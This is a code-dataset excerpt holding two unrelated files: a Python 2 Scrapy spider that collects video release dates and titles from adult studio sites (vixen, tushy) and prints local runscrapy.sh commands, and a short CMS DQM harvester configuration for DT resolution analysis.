#(vixen|tushy)\s(\d\d\.\d\d\.\d\d)\.(.*)(\.And.*)?\.XXX.*
old_article_XPath = "//article[@class='videolist-item']"
old_date_XPath = ".//div[@class='videolist-caption-date']/text()"
old_title_XPath = ".//a/@href"
new_article_XPath = "//div[contains(@data-test-component,'VideoList')]//div[@data-test-component='VideoThumbnailContainer']/div/a/@href"
new_date_XPath = "//button[@data-test-component='ReleaseDate']/span/text()"
#new_title_XPath = "//h1[@data-test-component='VideoTitle']/text()"
new_date_pattern = r'.*releaseDateFormatted\":\"(.*\s.*,\s201\d)\"\}\]'
#new_date_pattern = r'<span data-test-component=\"ReleaseDateFormatted\">(.*\s.*,\s201\d)</span>'
class SearchSpider(scrapy.Spider):
name = "search"
studio = ""
queryKey = ""
filedate = ""
baseUrl = ""
articleDict = {}
actionDict = {}
count = 0
showFullresult = False
def __init__(self, studio, queryKey, filedate="", showFullresult=False, *args, **kwargs):
super(SearchSpider, self).__init__(*args, **kwargs)
self.studio = studio
self.queryKey = queryKey.replace(".","-")
if filedate != "":
self.filedate="20%s"%filedate.replace(".","-")
self.showFullresult = showFullresult
#adate = datetime.datetime.strptime(targetDate, "%Y-%m-%d").date()
#self.filedate = "%s %d, %s" % (adate.strftime("%B"), adate.day, adate.strftime("%Y"))
self.baseUrl = 'https://www.' + self.studio + '.com/'+ self.queryKey
def start_requests(self):
urls = [
self.baseUrl
]
for url in urls:
#print url
yield scrapy.Request(url=url, callback=(self.parse_new))
def parse_old(self, response):
#print "handle vixen"
articles = response.xpath(old_article_XPath)
if len(articles) == 0:
print "Nothing found"
pass
for article in articles:
date = article.xpath(old_date_XPath).extract_first()
#print date
isoDate = time.strftime('%Y-%m-%d', time.strptime(date, "%B %d, %Y"))
title = article.xpath(old_title_XPath).extract_first()
cmd = "./runscrapy.sh %s %s" %(self.studio, title.replace('/',''))
if isoDate == self.filedate:
print "%s" % cmd
self.articleDict[isoDate] = [self.count, date, title.replace('/',''), cmd]
self.actionDict[self.count] = [cmd]
self.count += 1
nextPage_XPath = "//a[contains(@class,'pagination-link pagination-next ajaxable')]/@href"
nextPageUrl = response.xpath(nextPage_XPath).extract_first()
if nextPageUrl:
yield scrapy.Request(urlparse.urljoin(self.baseUrl, nextPageUrl), callback=self.parse)
def parse_new(self, response):
#print "handle tushy/blacked"
articles = response.xpath(new_article_XPath).extract()
if len(articles) == 0:
print "Nothing found"
pass
for article in articles:
movie_url = response.urljoin(article)
#print movie_url
yield scrapy.Request(movie_url, callback=self.parse_date_by_json)
#nextPage_XPath = "//a[contains(@class,'pagination-link pagination-next ajaxable')]/@href"
#nextPageUrl = response.xpath(nextPage_XPath).extract_first()
#if nextPageUrl:
# yield scrapy.Request(urlparse.urljoin(self.baseUrl, nextPageUrl), callback=self.parse)
def parse_date(self, response):
#print response.text
#with open("tmp_response.txt", 'w') as html_file:
# html_file.write(response.text)
#yield {
# 'url': response.url
#}
#print use regex here to parse the date, or otherwise go with splash....
date_match = re.search(new_date_pattern, response.text)
if date_match:
date = date_match.group(1)
realDate = datetime.strptime(date,"%B %d, %Y") + timedelta(days=1)
isoDate = realDate.strftime('%Y-%m-%d')
cmd = "./runscrapy.sh %s %s" %(self.studio, response.url.replace('https://www.' + self.studio + '.com/', ''))
#print isoDate + ' ' + cmd
if isoDate == self.filedate:
print "%s" % cmd
self.articleDict[isoDate] = [self.count, date, response.url.replace('https://www.' + self.studio + '.com/', ''), cmd]
self.actionDict[self.count] = [cmd]
self.count += 1
else:
print "No date found."
def parse_date_by_json(self, response):
json_text = re.search('window.__INITIAL_STATE__ = (.*)?;', response.text)
if json_text:
json_obj_txt = json_text.group(1)
json_obj = json.loads(json_obj_txt)
allMovies = json_obj["videos"]
for movie in allMovies:
if "id" in movie:
#print "#%s" % movie["id"]
date = movie["releaseDateFormatted"]
realDate = datetime.strptime(date,"%B %d, %Y")# + timedelta(days=1)
isoDate = realDate.strftime('%Y-%m-%d')
cmd = "./runscrapy.sh %s %s" %(self.studio, response.url.replace('https://www.' + self.studio + '.com/', ''))
#print isoDate + ' ' + cmd
if isoDate == self.filedate:
print "%s" % cmd
self.articleDict[isoDate] = [self.count, date, response.url.replace('https://www.' + self.studio + '.com/', ''), cmd]
self.actionDict[self.count] = [cmd]
self.count += 1
#print json_obj
def closed(self, reason):
resultTable = Texttable()
resultTable.set_cols_width([3, 20, 40, 80])
isoDates = self.articleDict.keys()
isoDates.sort(reverse=True)
for isoDate in isoDates:
resultTable.add_row(self.articleDict[isoDate])
if self.showFullresult == True:
print resultTable.draw()
#while True :
# action_no = raw_input("Your choice: ")
# if action_no == '' :
# break
# else:
# print self.actionDict[int(action_no)][0]
|
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
dtResolutionAnalysisTest = DQMEDHarvester("DTResolutionAnalysisTest",
diagnosticPrescale = cms.untracked.int32(1),
maxGoodMeanValue = cms.untracked.double(0.005),
minBadMeanValue = cms.untracked.double(0.015),
maxGoodSigmaValue = cms.untracked.double(0.05),
minBadSigmaValue = cms.untracked.double(0.08),
# top folder for the histograms in DQMStore
topHistoFolder = cms.untracked.string('DT/02-Segments')
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.